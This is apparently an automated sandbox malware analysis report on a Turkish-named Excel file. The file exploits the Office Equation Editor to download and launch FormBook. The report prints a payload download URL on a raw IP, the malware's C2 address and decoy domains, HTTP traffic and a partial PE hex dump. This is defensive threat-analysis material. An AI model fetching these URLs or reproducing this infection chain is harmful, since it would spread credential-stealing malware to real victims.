Windows Analysis Report
TedarikciSiparisi_83613 .xlsx

Overview

General Information

Sample Name: TedarikciSiparisi_83613 .xlsx
Analysis ID: 626598
MD5: 650bb8e5fe570bde782be21c4e9f421c
SHA1: fd3ffa031546f1dfa7ed884689ca1e85941fca1e
SHA256: 247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
Tags: VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
Multi AV Scanner detection for submitted file
Source: TedarikciSiparisi_83613 .xlsx ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://180.214.238.224/__cloud_for_file/vbc.exe Avira URL Cloud: Label: malware
Source: www.mentalnayaarifmetika.online/ocgr/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 41%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 41%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits
barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 180.214.238.224 Port: 80 Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036306A9 ShellExecuteExW,ExitProcess, 2_2_036306A9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036305BD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036306C7 ExitProcess, 2_2_036306C7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03630648 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03630648
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03630531 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03630531
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0363054D URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_0363054D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03630692 ShellExecuteExW,ExitProcess, 2_2_03630692
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036305D7 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036305D7
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 180.214.238.224:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 180.214.238.224:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 63MB

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.mentalnayaarifmetika.online/ocgr/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:14:18 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Fri, 13 May 2022 09:07:10 GMTETag: "38000-5dee0ffdad130"Accept-Ranges: bytesContent-Length: 229376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06 08 3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /__cloud_for_file/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.238.224Connection: Keep-Alive
Contains functionality to download and execute PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036305BD
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224
Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe
Source: EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe95C:
Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeX
Source: EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exehhC:
Source: EQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exej
Source: EQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeu
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC1A5DE.emf Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036305BD
Source: global traffic HTTP traffic detected: GET /__cloud_for_file/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.238.224Connection: Keep-Alive

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 2.3.EQNEDT32.EXE.6cecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_003358D3 4_2_003358D3
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E24D0 4_2_002E24D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5610 4_2_002E5610
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0678 4_2_002E0678
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E1CE8 4_2_002E1CE8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E1CE7 4_2_002E1CE7
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E65A0 4_2_002E65A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0638 4_2_002E0638
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: TedarikciSiparisi_83613 .xlsx ReversingLabs: Detection: 34%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$TedarikciSiparisi_83613 .xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5F10.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@6/18@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E3AC0 push esp; ret 4_2_002E3AC9
Source: initial sample Static PE information: section name: .text entropy: 7.92488075838
Source: initial sample Static PE information: section name: .text entropy: 7.92488075838
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036305BD
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
